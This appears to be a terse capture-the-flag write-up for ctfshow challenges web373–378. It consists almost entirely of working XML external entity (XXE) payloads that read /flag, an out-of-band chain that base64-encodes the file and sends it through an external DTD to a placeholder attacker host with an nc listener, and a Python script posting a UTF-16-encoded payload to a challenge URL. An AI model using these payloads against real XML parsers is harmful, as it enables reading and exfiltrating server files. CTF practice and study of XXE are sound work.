web373
payload
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>
web374、375、376
payload
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>123</root>
test.dtd
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://xxx:9999/%file;'> ">
%dtd;
%xxe;
服务器开启监听 nc -lvp 9999
web377
payload
import requests
url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>123</root>"""
payload = payload.encode('utf-16')
requests.post(url ,data=payload)
开监听拿flag
web378
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>